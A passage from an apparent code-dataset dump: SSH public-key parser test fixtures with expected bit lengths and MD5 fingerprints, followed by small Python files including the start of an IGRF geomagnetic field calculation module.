['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "1299-bit RSA, converted by ojarva from Ope"\nAAAAB3NzaC1yc2EAAAADAQABAAAAowYV74xpHjU/esNFWOAZvh3JiHlPgmeIFPBeKiZsP2\nOS/yxulMs/MbM6Cc0Q0GFhF3ycNu6rsjQHuoLbFxcrRA4reBDU+BFA9YeG9ptdpBW2rjl+\n/MjPML2cmIiF9VOuwia8WWLH/gro/AECoEiAbKUJcbD8PdGfZpb/QZyGl+5WpoKW3OD9PT\nDJmI6to2lp+NNx2bvV08sb2z8zVJXLgBrQ0Vc=\n---- END SSH2 PUBLIC KEY ----\n',
1299,
'MD5:40:fa:26:65:60:fd:62:ee:03:70:bf:db:15:53:78:bf',
None,
'valid_rsa_1299_rfc4716', ["strict", "loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "1302-bit RSA, converted by ojarva from Ope"\nAAAAB3NzaC1yc2EAAAADAQABAAAAoyx+ox9qPgBMrRireysGh3SOuMj9rPXgPIgTRCH4Yg\nHJavaIKNE3l+FPYT2r4ri2Ej5kIN351muDMaaiT8dqWWcOSoFFNPv1DZ75iVBBvQBhAgP2\nkllbzI4/e0qqc0BGBW2c19rTIQK2uSfFCTcVaIJQooM6knKYUPWNUJWc4C+/NYD7hRp9s1\nMXgMO6F1ajJKD+z51zoFXcMZKb3yODguWSU90=\n---- END SSH2 PUBLIC KEY ----\n',
1302,
'MD5:96:b3:a5:61:3d:8d:86:2b:ee:94:dd:e8:e3:6a:26:03',
None,
'valid_rsa_1302_rfc4716', ["strict", "loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "1305-bit RSA, converted by ojarva from Ope"\nAAAAB3NzaC1yc2EAAAADAQABAAAApAGFxZYSi3pcajPO4+bBOc0lKv9NzuIB2CcY8HdZEQ\ne0QGbbu/saDgFuMLirBlZrkldSRdFgCVpTVScxbABvX0Cx7sPNwPag8QTsgI/phQivCGx2\nU7/2jsJDcfCj1uHGnTKWh8b4wNto0lpaeo0aSMZfymgjDEkgxpWBhJMgkWwlOP3hWSXl43\nmO0bcfHoyuDHccbmwztExuQ2ImpkJaDOVrom9f\n---- END SSH2 PUBLIC KEY ----\n',
1305,
'MD5:12:a1:ab:e8:fc:ca:e1:21:a7:06:86:e7:7a:fd:10:ca',
None,
'valid_rsa_1305_rfc4716', ["strict", "loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "1308-bit RSA, converted by ojarva from Ope"\nAAAAB3NzaC1yc2EAAAADAQABAAAApAxM2gGIaiwCkuzBjFsmgh0GEmwmf/5+dxm9HWz2PU\nsG8utJN1mCyLWkuWhwBiOnttvKIvfKbmr8KAIvwGUOQyMjE8Xi2JuMl4Vc3HvVGbeNQXhw\ngyXsE7ykjHZioddaOwv87j+SzDlP1As2hq9VOtTByIrqo7Qn/OCDJI0z6fBhtbtjFTjdBB\n7ViSfKw8TEgexSyIPxTe74RQjmalA9UEXyUHlx\n---- END SSH2 PUBLIC KEY ----\n',
1308,
'MD5:ef:51:09:9b:4e:b5:3a:15:05:19:15:68:66:c3:bb:16',
None,
'valid_rsa_1308_rfc4716', ["strict", "loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "1311-bit RSA, converted by ojarva from Ope"\nAAAAB3NzaC1yc2EAAAADAQABAAAApFgBPZxYXC1JXtkOO6irCMCmoz+jzWg5GLqd0V2rZA\npdQ16JrsX/DTO9V5NTCiLQbN1UqW8EuJXLKNyzZefh9EdzwciOzIPIyFqPsklNKWhWeX31\n1jMUmbCS7M9+Pxi/wQ3FG2uxycb8ZX8THI7T5L1QvyJivxGPxZAQXpVZvD9j0zalCyVdkF\nDRJCE3jkK2jGyu2RFZT6NZEo9qpqo8H7f1L6q5\n---- END SSH2 PUBLIC KEY ----\n',
1311,
'MD5:fb:ff:40:35:e5:78:e9:03:f8:d2:c1:71:39:82:3b:fc',
None,
'valid_rsa_1311_rfc4716', ["strict", "loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "1314-bit RSA, converted by ojarva from Ope"\nAAAAB3NzaC1yc2EAAAADAQABAAAApQOZtuX6wLBkB2f9hm4iCbJwhteR1+o3+dfxb5lWE8\nf3GOld2b/up8vd+GLMM6kHhkfUhpPNdJ0PfSu8L/p51MPq0PfrD1IhO9u7d/U4Tebyy6Uz\nRPsPo6j38cU7rcIqHZwDiGCon9VO4x3WF58l2WJ0P/UcnLYVjC/jXioQBF1la7IPs3H4g+\n+jy/9oQNn4/NH8/Lk5oTUF9aHOtsauCxrqzGGCQQ==\n---- END SSH2 PUBLIC KEY ----\n',
1314,
'MD5:7b:49:e3:c5:53:89:b5:30:5f:0a:f0:5f:12:9d:92:95',
None,
'valid_rsa_1314_rfc4716', ["strict", "loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "1317-bit RSA, converted by ojarva from Ope"\nAAAAB3NzaC1yc2EAAAADAQABAAAApRS5H4cONMXNAgn+CmPJXaTyZI+R9jai89ATYSUuBJ\nVVI5MOVBoRTYzZISi/nMDdsH0D14zlOsmc+5+aHCAkFlBOSag23xHj3gfPsLcs6AjX/irv\nhjBoj7bOSI1Tzxggc+S1sOd4WmZo9jLpxXQ0H1Md7ic5rFg/oU2qA8TuCm1jBUpviTL3xM\n/fNraLnIUcPWG8o4LJL71YZc6quWXjNEmK7u0kYQ==\n---- END SSH2 PUBLIC KEY ----\n',
1317,
'MD5:41:6d:91:da:82:7f:b3:5b:e3:b1:6d:4a:23:8e:7d:b7',
None,
'valid_rsa_1317_rfc4716', ["strict", "loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "1320-bit RSA, converted by ojarva from Ope"\nAAAAB3NzaC1yc2EAAAADAQABAAAApgDURQ01EZNnjdCKce3/28LbXfLwQtaS+k7TK/jRik\nonejiiN7MXaayqahhNry/Edzf2/WJSOnBbBdhgLxhBgPJy8Yk/koaD6DmjnJ0Hrl+s1RBU\nAGsW2Da9/b9VIYkPbPJ6UwiTDB1SPF6jINqW7mLvOxt9onJwz95uct1udwk8XHp709vv6b\nRn5xpq26BukOvBxhu3KX8h68txqSDFmH6haEzjXoU=\n---- END SSH2 PUBLIC KEY ----\n',
1320,
'MD5:27:33:d2:ae:58:fc:b8:4f:41:36:de:24:ba:2d:3f:c9',
None,
'valid_rsa_1320_rfc4716', ["strict", "loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "1323-bit RSA, converted by ojarva from Ope"\nAAAAB3NzaC1yc2EAAAADAQABAAAApgYP1GJHBP+AnJiU4AQITNotMWbxM41bTVwrYC4UAW\nmgm/v8F8U5R+HHWcwyPahNt7vVJ4fw8MshVLNVcGf598F1vEJuKvKMuPQjetJcGxfSA/g5\nby/aPIdzstUUp8afsFOyEJOAf23pdw5k6QmyPPbAg8/zGoZkZ3lbnnr9gAOK5iSuwW4Zju\n/LTPDuu89cBrvlFr05xpxVArh6H0gRo18T2xjz/z8=\n---- END SSH2 PUBLIC KEY ----\n',
1323,
'MD5:c1:82:87:db:76:e4:2b:b1:b0:7a:c3:a2:a4:da:75:45',
None,
'valid_rsa_1323_rfc4716', ["strict", "loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "1326-bit RSA, converted by ojarva from Ope"\nAAAAB3NzaC1yc2EAAAADAQABAAAApic5f0WgrxUGHUSG1he6A6CVjBbjWrckrMliNhHo5m\n38Q+TmALI+4ktbtDG61Y58SGVXaBvFnlkba6PsBfq0dudJn6zhcWohOCX2jwJAdUOhPuVf\nL6e4fNLfJmnyeIGS9vtXSkk/PYXshkEPq/UerOlpAS+jxZnXPZnnpIHrX/NvMarLKLA/f6\nuaDfF3jIl7TxT4I1Bhn9KtlBZOzrC2sTsnnkcWiVE=\n---- END SSH2 PUBLIC KEY ----\n',
1326,
'MD5:f9:3d:7a:eb:a8:b5:0b:f3:f1:1d:c0:fa:3e:c2:0e:8e',
None,
'valid_rsa_1326_rfc4716', ["strict", "loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "1329-bit RSA, converted by ojarva from Ope"\nAAAAB3NzaC1yc2EAAAADAQABAAAApwGHoGv4qz/U0A5j/wuDQzq9GtQEQv6Z0cs03/cBb8\nJLmj+xnZIlM7dgzvxfSmutjR0m5E+rbUuRYNoYpeVZtaD8r5h3Dj2bvWnmf2U0vReHZhH9\njuEdOrVDuZtXU4SkRo1P3f5HuVeo6D5U1gkSg2YUpYpGE3Y+nhEWmiZrBcns8Yw1z72rva\neCjRwzyZgSpyVRQOXygmiOP/3GIfb8zNChd3qWJtlP\n---- END SSH2 PUBLIC KEY ----\n',
1329,
'MD5:89:2c:f6:06:f8:5e:f3:bb:cd:28:33:4b:0a:6d:10:ed',
None,
'valid_rsa_1329_rfc4716', ["strict", "loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "1332-bit RSA, converted by ojarva from Ope"\nAAAAB3NzaC1yc2EAAAADAQABAAAApwraDBOJz0St0svlhB7cN7Cy67vH5/X9jvyMMIeHH/\nzNAR89TyWRLWkARidtqOIqgyPzRj2nCSm5ISu2T+/DHNZcP0shhcRoKLh52otz+gJatyvs\nYL1w4ZW6P1h8U6Faf2DbxsUcfIYVx3K2O4V1m/8+aDQjFIW4a0bARU9liu3Z1LB9f6NwS6\nZEcHb8dlo+3lsnkjVFR6Xl1zzs86pPBGJRA0HYf2yB\n---- END SSH2 PUBLIC KEY ----\n',
1332,
'MD5:16:69:3d:b8:cd:a0:78:8d:7b:0b:0e:99:24:c1:d1:4e',
None,
'valid_rsa_1332_rfc4716', ["strict", "loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "1611-bit RSA, converted by ojarva from Ope"\nAAAAB3NzaC1yc2EAAAADAQABAAAAygXJwDBDbv4+4J+zx90C9wUmXaXKiCvQf4LG08Rp6N\nXjWPCGFEclp3MP1apbEVzrSYwEFHFtEODwAdT6SdZWzrOu0pi/ee4E+5oBNoxsRq7Ggk7q\n/YH7I/rPv/av3nz3M7he6AC1Urn9iDtgg2kRrG93iD5bBngq9mBa2XRWykF3LfSIR6UcCW\nlhvNMlhQ6HX+h5jwe2Ali+zCArVYK4OwIDDRRN1vQpFa41wnadwz7jYRtUU6rb0HOpknzV\nVLLEMA9hesdv7IfmA/k=\n---- END SSH2 PUBLIC KEY ----\n',
1611,
'MD5:ff:ac:71:02:fe:38:a0:c8:58:4c:06:6d:cc:ee:e7:0d',
None,
'valid_rsa_1611_rfc4716', ["strict", "loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "2013-bit RSA, converted by ojarva from Ope"\nAAAAB3NzaC1yc2EAAAADAQABAAAA/Bg4DNQh1RFnvgCi0Q3vCrUYBB6oZufUK7AXrtFRD+\n8n/QRvQnQPE59tQHlQ8FvLbVq/uqj/HzO9iRWlqP05/GB4byZWwk1vDfGFqOL/5rTUdcdo\nkRcy2zzGIWWzbhUbnoKNWpr7f/nRBzTvvcUVlAJTTITjd+87cb/Gr74GQIhM7Ao7tv7qE+\nqVtCWj9G4i4ojmfAMoWIGMRRbAkr7MdnAIV7UVwC8AN/gz8zIYhutHX3p9SxWy5V0UgQjV\nwJh5Vb72pndUmJXmjUyzuZXqxAOFtfXge0WwCMRd/bDcBPILaa33KxlHc48IpS351pVeka\nS1KsheVBzus00S6w==\n---- END SSH2 PUBLIC KEY ----\n',
2013,
'MD5:a8:9c:d3:a5:97:65:61:39:a8:98:e6:59:bc:f8:f2:06',
None,
'valid_rsa_2013_rfc4716', ["strict", "loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "2016-bit RSA, converted by ojarva from Ope"\nAAAAB3NzaC1yc2EAAAADAQABAAAA/QD1WMI5FCXEgGSYPVJkDexjZMU9OqokStDg8LL5gu\nY+b9EECEJ4xWMnGFC8CbyMDHmUQiYRpbh8bUzU8uLt0wLrEn15yc5R3F3BCX1kdjlKcLpo\nQryHvL2aJNNv02atgJ2os9QSsY8O6yOoPlSC/vmGurHPrtoL7sRVUPcHtPU5QlqvkbdFAm\n0dQ0BrGE6SH9Ia7cv3f9ky0WexFrdmxTiMK8gT1ZkhIlM2iQVct/pz1R4VL+GXU2ia5CHp\nl8Ag4NrIw+O0Y1VfakOtXMfr2RhbS8DZDKvVaJVveoqv9LQe8Nq+uPu0A+KY1KVHbZyvlS\nsoH7NKkbF4SRYzK9U=\n---- END SSH2 PUBLIC KEY ----\n',
2016,
'MD5:e2:33:6d:69:a8:4e:fd:52:15:7a:6b:a9:8a:3e:63:00',
None,
'valid_rsa_2016_rfc4716', ["strict", "loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "2019-bit RSA, converted by ojarva from Ope"\nAAAAB3NzaC1yc2EAAAADAQABAAAA/QYQGpPpfnSgFbyZx3klNz4FyTCdDY7bq1fwRsP7wr\ng7yfX7IimAdDcTcoVyd6JEaYqlNCtK9ClTwSmuVVpmS6p/834DQtzOhvxs7u3cti4buYX7\nmLfnmAfLI80eeFGXGr1K2owsFEHbEAJTG007BvcezM4V7l54iniTGCoxrvbHrp3Puc46gm\nGEo6J2bDDYXKD9xmuVL0XrUYqvR34fVswMABSlNN9ROdxCI5jxKhuOrL0sZg/faf+973Cf\nJWPfFGPkOaINSpUgBDKVTRwWL86IjIEnDdiIyNAxAnbZOyGAMO0+0iyWOBso7QxFt7UoYi\n/C803I1BCGbXqCAGs=\n---- END SSH2 PUBLIC KEY ----\n',
2019,
'MD5:e4:a5:13:0a:bb:06:02:34:68:1d:2a:69:6e:b2:82:0d',
None,
'valid_rsa_2019_rfc4716', ["strict", "loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "2022-bit RSA, converted by ojarva from Ope"\nAAAAB3NzaC1yc2EAAAADAQABAAAA/TDTpJy8OjtlM9F+UClxMF4XFN/LRh63c2JgBVquLm\n9pevlsRRsN3MUk+N5b6hDcluKYOI5loOyXTuPkuGYdxowuTOkS3sdp7zZAhkeRW/g8ChnO\neiNWkGwR6vCbJh2Kbhvn3QG/fZgG5E0hRfqn8hfShNsWZeH5m7eiurwL30a7Mx+m9OsdEE\nea91wQckGAskA7nz2nLzEL5J7eVK4c+gMKsyLDB8R9w1oYsbsUPfbv+7tDNwg+Ur03nXJ2\n31oHog3LLLSixvC24272ZJ14v8DFQnDcDzQDrrmoXdkRNrMsXIGaf/J9VFk49oJ7NHJzGv\nhNUeuGwuhrx7bs2aU=\n---- END SSH2 PUBLIC KEY ----\n',
2022,
'MD5:20:94:06:c0:3a:81:02:c1:bf:39:a8:1c:07:4d:db:3c',
None,
'valid_rsa_2022_rfc4716', ["strict", "loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "2025-bit RSA, converted by ojarva from Ope"\nAAAAB3NzaC1yc2EAAAADAQABAAAA/gFaVjuZJF8V5h/F3aJ/fs2MINAuoJH+VfqJb1rhsX\nljXV0XOEyHo7XyiZX7KVQ2AFB7ZWmtVjDu5wGgU6zKfvfoytbPPlYwaGf7RikRGdCWvsJn\nwB9PChAV9WsDqe4NODzaFIv/tiAUsy5CChkESIJeNLK2K/KQtEWSmu57hsr8terigCufSY\nt2YjKcKErIbRNVwu2SqfHSjPKRXzmjTbDpUpvCY3nU3kWJmhsZHPNz5J8z7xV5NSJPgjWM\nToKi+st9XJI/t7zYWrdwx4DCEjvKdGBKf3BklYrqx1c+vWhwclNyUd+zquGmhUTvsReI0A\n0e1o5mPM/n/uU0fyJ/\n---- END SSH2 PUBLIC KEY ----\n',
2025,
'MD5:60:95:d4:ec:69:ff:a6:1d:c7:dc:fa:fc:9c:45:b1:23',
None,
'valid_rsa_2025_rfc4716', ["strict", "loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "2028-bit RSA, converted by ojarva from Ope"\nAAAAB3NzaC1yc2EAAAADAQABAAAA/g1KS2Amcx2dKUY/AaDl+S9Nl5T8fqinfhurFuom2G\nAzcq30DtqAK5FVHXCKiYH9l4v+GDe7fi5nYX7teajgThPLUUPd0KSUa2xFcMZqDVOzv5jn\nB9lFVPZiQmRh4uP0dycxwtdYYGsOjkbriKfpTD/nlqzNPtaGInFRzGRPsaHSr2qYI8IHug\nG/A3SDxaJiNsNH4dg2QKQK0q4OxIn+tsFuiVJCessDpoKS0C4NzZYxKvsc0+2Ke7Qk1yXF\nDCyDlAagNGkjQLldsVWavdffv9u71ZnWi1jqyMEmG0nbtHJLasaiS+JKppN3drgxD5eheu\nhewJjMDzC3iBRRmhin\n---- END SSH2 PUBLIC KEY ----\n',
2028,
'MD5:46:6d:20:95:d9:ba:4f:73:2b:dc:16:ae:c6:50:68:33',
None,
'valid_rsa_2028_rfc4716', ["strict", "loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "2031-bit RSA, converted by ojarva from Ope"\nAAAAB3NzaC1yc2EAAAADAQABAAAA/mNcgBv75NCxkdwWznRWS9j4lBiE3kt+u/CmQl2UxE\nyDm6C5w42WCG6iHObmrOisUOC+FA7GqcanPw5FBPiXNGNFdPbFmOiHplkE6fe9LZeWSZWx\nseZKc0ShjQZ1MaUWDZeSlFoy1s71PO84eFFpn7yE6wt/KlhEoCIpdXai2wpJdTVp7gOQ4x\nYNRVYScWdj8nfAHM9mj7YM0AGymEI3nU4yDokAzktWDp/Y5u64+l0bTu4irA/NIP8ctBkD\nVZMwOyRbIcJkWYlGnJnyxR4JOefR8GhOH0z/YIE42KqJoHHL299JMFOT7HaBBm7YHFoq/K\ntKUZrSKlHTCLRfiA59\n---- END SSH2 PUBLIC KEY ----\n',
2031,
'MD5:6e:7c:f6:0b:e3:6e:2d:a7:e1:e9:4c:68:d3:89:ba:d6',
None,
'valid_rsa_2031_rfc4716', ["strict", "loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "2034-bit RSA, converted by ojarva from Ope"\nAAAAB3NzaC1yc2EAAAADAQABAAAA/wPaxCp9EthdCMUBIZMPfmpk4UHQV5IENsAagu6krz\nafIWJNpH1tdZGLJ7KWCS9tzXYLuPux2ZbHkDpAc6zXPY722WtWZsV81t/+WPdQcxoY0/nC\nPR6CK6XUgzYyrZbZvwu2yx5u20aSLsrDYunKmkZkz11rjBSQPrL9SikanpaDHibzlpTPa/\nXvb8Mv9ty15dYWlP/Kwgo1VN+xXai2BchwQ/rGdhhc5nEotRxFByc9onkJJA3jQrtzKw6P\nYmkAYcX5yftPfUkcgC3qaFP4FR8zIcZICgoJKClaevimv6Om1lkAKaOJbYxkFtKciuufF2\nUw61t1FiAanbKc+5U0sw==\n---- END SSH2 PUBLIC KEY ----\n',
2034,
'MD5:dd:49:3c:ba:e5:dc:e2:f1:ef:ed:80:c5:0a:ed:7f:aa',
None,
'valid_rsa_2034_rfc4716', ["strict", "loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "2037-bit RSA, converted by ojarva from Ope"\nAAAAB3NzaC1yc2EAAAADAQABAAAA/xW3UoBjiOoneRlPJn2vCyg8iUJqTx5JSUJcrbpr5x\ncUXVUykVDMI7VnPqsQbX0PUwU47z2Qp7KBUfslSh6CkBOLZRxxHGf/EAj2Or86K4ZxJJx3\nT/Zrq7yzThAGOOKq+QzTBmsfQTCdgy4XDs0Axcpbohk6lIhscq86Lc4V2hL/JJUdlmt3Nx\nfeBuoq+7jD/HLV2VFRs62pBJQCePM/9m4rWPApbfdNlq7V03ncFx1hsVWMcmBrlLUxgW+k\nu8bt74kyZnNcWYflOkxMH8IsZH73xkpF5E5uHtnxClZ2rrzrBWDyHco7wGJNrG/cTKPOAS\nn3VoomdBAJ+ea24lGlkw==\n---- END SSH2 PUBLIC KEY ----\n',
2037,
'MD5:2f:71:47:7f:51:99:97:b7:00:74:76:43:35:a6:9e:5d',
None,
'valid_rsa_2037_rfc4716', ["strict", "loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "2040-bit RSA, converted by ojarva from Ope"\nAAAAB3NzaC1yc2EAAAADAQABAAABAAC8AOpsr/bye5kOvXynQanwbDwusCLkFA1B/UmYVp\nB4lGlp7p/RKcOZ9uiwsnPP0JQ7OrZ5O+oDIW2WdHPfjfzlGCyoMuL3+PwHzqB+L8A8/9hR\nXLJAulufUvi/vFRfxUc05q/BWwGE6RsIzadvpdm9XtdXoG9eElpn7J+k4WE+5V9rR2c7Tz\noOt5TP/4emAwcHAxQIaIygijdHISS3CYIAWmIM33U5HbEbQBRrAE6I6y0gQxvhHCEat0c5\nRJ/zSqXJpplAtE7n0DUqC9kmnJsDAB9Cq7hxiRrttrMvl1ERoK0XW3wWwqi6mvVv3HHOfV\nj1lxLEwpeLEHRTQdS5sy0=\n---- END SSH2 PUBLIC KEY ----\n',
2040,
'MD5:99:6b:1d:c1:2b:d3:83:63:4e:a1:ea:51:c6:4e:25:17',
None,
'valid_rsa_2040_rfc4716', ["strict", "loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "2043-bit RSA, converted by ojarva from Ope"\nAAAAB3NzaC1yc2EAAAADAQABAAABAAXo4IUS1bJYWrydi8B+t68xzH97cpUcKEWgWqQvy6\nebRw/Y/G5kHVOHD9vGBLX2j4dseB+71meNxeaTkQCDPmck4FFFe8LlfJgcJupAwVnEu/YS\nne55MHa9fO1hiZsg/oiZabS/DKoyOHLE7Usa/JQXJzGaRtLWAP1vWuCigfX/yfLA+CXxA6\nFh6VVaEhlUAdOoVZ/aFBrwsG19Yp5sU23HSIHAmkFMApb5jvlQbjQrLzQr9qmiRgsylFPi\n5OHp2tvbQeRKA9XzKVjpof4tSd0JDq5XgUHtlRI9CsIrVxjUJS8WkdDWW/uNWFQhQ5CS33\n2Jvet9xP6ZZpsYxS5KpQU=\n---- END SSH2 PUBLIC KEY ----\n',
2043,
'MD5:af:82:da:e7:04:5d:a0:38:30:b4:5f:ae:e2:87:63:f2',
None,
'valid_rsa_2043_rfc4716', ["strict", "loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "2046-bit RSA, converted by ojarva from Ope"\nAAAAB3NzaC1yc2EAAAADAQABAAABADR9kolU4uiD26LMrbakQlNf4QWB2xrdY3nASf6CJd\nQYzTMjNmbt6sJ4A4pGnCupFrzL04EYDvbVmT4GEZm6CU4BsY61yosnpGSqqcVCdw5xW1k4\nbCSDPW75WHLCVmYyROhZ+yyo8uAcIy5UIyBZXF/PO7taJrrIi5RwdqIPwtCrJ3dJkcFWa3\nqZWJykLAFQD5A/lta/egS/u/nyCap2e16WGnvSluz9CyYtGFNS9axzOwHxLFEv2ocOsJjY\ngzV+Jfpiao94A4VzLKbUDHlfV57KS0tJaT8FKKsg34vN3bsD0zUftLUPpUFgJfMwje0C2r\nCJkCzwgya2vxLqj2fg0Q0=\n---- END SSH2 PUBLIC KEY ----\n',
2046,
'MD5:27:24:34:50:5b:39:2d:34:f9:60:d5:4e:7a:c7:11:51',
None,
'valid_rsa_2046_rfc4716', ["strict", "loose"]]
]
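Each fixture above pairs an RFC 4716 public key block with the expected modulus bit length and MD5 fingerprint of the decoded key. A minimal, self-contained sketch of how those two values can be recomputed from the key text (the helper names are mine, not part of the test suite):

```python
import base64
import hashlib
import struct

def parse_rfc4716(text):
    # Drop the BEGIN/END armor and header lines (headers contain ':'),
    # then base64-decode the remaining body lines.
    body = [l for l in text.splitlines()
            if l and not l.startswith('----') and ':' not in l]
    return base64.b64decode(''.join(body))

def rsa_bits(blob):
    # SSH wire format: a sequence of length-prefixed fields.
    # For ssh-rsa these are (key type, exponent e, modulus n).
    fields, off = [], 0
    while off < len(blob):
        (n,) = struct.unpack('>I', blob[off:off + 4])
        fields.append(blob[off + 4:off + 4 + n])
        off += 4 + n
    modulus = fields[2].lstrip(b'\x00')  # strip the sign-padding byte
    return (len(modulus) - 1) * 8 + modulus[0].bit_length()

def md5_fingerprint(blob):
    # OpenSSH-style MD5 fingerprint: colon-separated hex of the raw blob digest.
    digest = hashlib.md5(blob).hexdigest()
    return 'MD5:' + ':'.join(digest[i:i + 2] for i in range(0, 32, 2))
```

Running these helpers over, for example, the 768-bit fixture reproduces its recorded bit length and fingerprint.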
11379aaed54e86f8be1a0e15498bb9d6d644743f | 41 | py | Python | src/component/__init__.py | KennFatt/Transact | 0c62bb5dbfa4e062662cd0216613522bed26d71e | [
"MIT"
]
from .hoveredbutton import HoveredButton
114700cef79a4c8eaf9b1fd6a1d28244e3b36553 | 290 | py | Python | src/zeep/xsd/__init__.py | ellethee/python-zeep | 356e12ba809e6b0cb476c6e5543a3e7353342e9c | [
"MIT"
] | 3 | 2018-11-26T16:17:03.000Z | 2021-09-27T12:36:51.000Z
"""
zeep.xsd
--------
"""
from zeep.xsd.const import SkipValue # noqa
from zeep.xsd.elements import * # noqa
from zeep.xsd.schema import Schema # noqa
from zeep.xsd.types import * # noqa
from zeep.xsd.types.builtins import * # noqa
from zeep.xsd.valueobjects import * # noqa
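This `__init__` flattens the package namespace: names from the submodules are re-imported here so callers can reach them directly as `zeep.xsd.<name>`, and the starred imports only pull in what each submodule exports. A self-contained sketch of that mechanism using a synthetic module (`fake_elements` and its attributes are invented for illustration):

```python
import sys
import types

# Build a throwaway submodule with one public and one private name.
mod = types.ModuleType('fake_elements')
mod.Element = type('Element', (), {})
mod._internal = object()
mod.__all__ = ['Element']            # 'from ... import *' honors this list
sys.modules['fake_elements'] = mod

ns = {}
exec('from fake_elements import *', ns)   # what the starred imports above do
print(sorted(k for k in ns if not k.startswith('__')))  # -> ['Element']
```

Because `__all__` (and the leading-underscore convention) limit what `import *` copies, private helpers in the submodules stay out of the flattened namespace.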
115366ff06d9f85a04965edac8def31679a8292e | 91 | py | Python | weakvtg/math.py | lparolari/weakvtg | e5d5f738ff0d916da8b31e967aa21f01fb74a906 | [
"RSA-MD",
"Info-ZIP"
]
def get_max(xs):
    """Return the maximum value in the sequence xs."""
    return max(xs)


def get_argmax(xs):
    """Return the index of the first occurrence of the maximum value in xs."""
    return xs.index(get_max(xs))
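A quick usage sketch of the two helpers (redefined here so the snippet runs on its own); note that `get_argmax` returns the index of the first maximum when there are ties:

```python
def get_max(xs):
    return max(xs)

def get_argmax(xs):
    return xs.index(get_max(xs))

scores = [0.1, 0.7, 0.3, 0.7]
print(get_max(scores))     # -> 0.7
print(get_argmax(scores))  # -> 1 (first of the tied maxima)
```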
116368a59b2173d460c1c636e90ef434d303b1fa | 39,227 | py | Python | mkigrf.py | percyd/Python-for-Earth-Science-Students | 24a105599391acbe9dc8efcb04051973881f6c72 | [
"CC-BY-4.0"
] | 71 | 2017-12-18T08:48:48.000Z | 2022-02-23T22:08:57.000Z
import numpy as np
def doigrf(long,lat,date):
"""
Calculates the interpolated (<2015) or extrapolated (>2015) main field and
secular variation coefficients and passes them to the Malin and Barraclough
routine (function pmag.magsyn) to calculate the field from the coefficients.
Parameters:
-----------
    long : east longitude in degrees (0 to 360 or -180 to 180)
lat : latitude in degrees (-90 to 90)
date : Required date in years and decimals of a year (A.D.)
Return
-----------
x : north component of the magnetic field in nT
y : east component of the magnetic field in nT
z : downward component of the magnetic field in nT
f : total magnetic field in nT
By default, igrf12 coefficients are used between 1900 and 2020
from http://www.ngdc.noaa.gov/IAGA/vmod/igrf.html.
To check the results you can run the interactive program at the NGDC
www.ngdc.noaa.gov/geomag-web
"""
    models,igrf12coeffs=get_igrf12()
    # snap the date down to the start of its 5-year model epoch; altitude is 0 km
    model,alt = date-date%5,0
    if date<2015:
        # interpolate: gh holds the epoch coefficients and sv the annual rate
        # of change, derived from the difference to the next 5-year epoch
        gh=igrf12coeffs[models.index(model)]
        sv=(igrf12coeffs[models.index(model+5)]-gh)/5.
    else:
        # extrapolate past 2015 using the predictive secular variation row
        gh=igrf12coeffs[models.index(2015)]
        sv=igrf12coeffs[models.index('2015.20')]
    # evaluate the field at colatitude 90-lat and east longitude in 0-360
    x,y,z,f=magsyn(gh,sv,model,date,1,alt,90.-lat,long%360)
    return x,y,z,f
#
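The gh/sv pair computed in `doigrf` is handed to `magsyn`, which advances the epoch coefficients linearly in time. A toy sketch of that interpolation step, using an invented epoch table rather than the real IGRF coefficients returned by `get_igrf12`:

```python
import numpy as np

# Illustrative epoch table: each row holds a couple of Gauss coefficients
# (values here are made up for the sketch, not taken from the IGRF table).
models = [2005, 2010, 2015]
coeffs = [np.array([-29554.6, -1669.0]),
          np.array([-29496.6, -1586.4]),
          np.array([-29442.0, -1501.0])]

date = 2012.0
model = date - date % 5                            # start of the 5-year epoch: 2010
gh = coeffs[models.index(model)]                   # coefficients at the epoch start
sv = (coeffs[models.index(model + 5)] - gh) / 5.   # annual rate of change
gh_at_date = gh + sv * (date - model)              # linear interpolation to `date`
print(gh_at_date)
```

For dates past the last epoch, the same arithmetic extrapolates instead, with sv taken from the predictive secular variation row rather than a finite difference.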
def get_igrf12():
"""
    Returns the available model epochs (dates) and the corresponding Gauss coefficients.
These coefficients are the IGRF12 coefficients from the NOAA website.
"""
models= [1900, 1905, 1910, 1915, 1920, 1925, 1930, 1935, 1940, 1945, 1950, 1955, 1960, 1965, 1970, 1975, 1980, 1985, 1990, 1995, 2000, 2005, 2010, 2015, '2015.20']
